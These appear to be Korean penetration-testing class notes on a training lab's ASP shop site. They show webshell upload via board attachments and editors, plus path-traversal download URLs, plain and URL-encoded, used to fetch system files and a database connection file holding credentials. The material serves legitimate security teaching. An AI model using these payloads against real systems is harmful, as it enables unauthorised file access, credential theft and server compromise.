#모의해킹 사이트
#유선랜: http://10.10.0.153/
#무선랜: http://61.39.155.24:50003/

#공유서버
#http://192.168.100.30/

#파일업로드
1. 악성 프로그램 업로드 조건
 1) 업로드 기능 애플리케이션 찾아보기
  = 게시판의 첨부기능
  = 게시판의 Editor 취약점
   - fckeditor
   - smarteditor
  = 주석처리된 첨부기능

 2) 업로드 한 파일이 서버에 업로드 되었을 때 확장자가 ASP, PHP, JSP 등으로 저장되어야만 URL을 통한 실행이 가능함
 3) 개발 운영 환경과 동일한 언어로 작성된 악성파일을 업로드 해야 함
  * LAB: http://www.igloosec.co.kr/BLOG_Webshell%20%EB%B6%84%EB%A5%98%20%EB%B0%8F%20%EB%8C%80%EC%9D%91%EB%B0%A9%EC%95%88?searchItem=&searchWord=&bbsCateId=47&gotoPage=3

http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=webshell(37).asp&f_path=upload_file
http://10.10.0.153/demoshop/shop_board/upload_file/webshell(37).asp

#파일 다운로드
1. 파일 다운로드 기능이 구현 애플리케이션에서
2. 파일 다운로드 요청 시 파라미터의 값에 경로 이동 특수문자를 이용
 1) 상위 경로 이동 특수문자
  - ../ (%2E%2E%2F)
  - ..\ (%2E%2E%5C)

3. 인가되지 않은 서버내에 중요파일을 획득하는 공격기법

http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=test.txt&f_path=upload_file

Q) 파일 다운로드 공격기법을 이용해서 C:\test\top.txt 파일을 다운로드 받고 열어보세요!!

http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=../../../../../../../../../../test/top.txt
http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=top.txt&f_path=../../../../../test
http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Ftest%2Ftop.txt
http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Ctest%5Ctop.txt

Q) 데이터베이스 접속정보가 있는 서버측 파일을 다운로드 받아서 접속정보를 확인하고 데이터베이스 접속까지
 1. 디렉토리 리스팅 취약점을 이용해서 DB접속정보 파일의 경로명과 파일명을 추측
 2. 추측하신 DB접속정보 경로명과 파일명으로 파일 다운로드 공격을 통해 다운로드 받고
 3. 해당 파일을 열어보시고 아이디 패스워드 접속주소 등 확인
 4. SQL GATE FOR MSSQL을 이용해서 DB접속확인

10.10.0.153 - /demoshop/login/login_check.asp
http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=../login/login_check.asp

10.10.0.153 - /demoshop/login/login_check.asp
<!---#include file="../admin/dbconn.asp"--->
10.10.0.153 - /demoshop/admin/dbconn.asp

http://10.10.0.153/demoshop/shop_board/shop_download.asp?strFileName=../admin/dbconn.asp

#파일 다운로드 우회기법
#http://10.10.0.152


























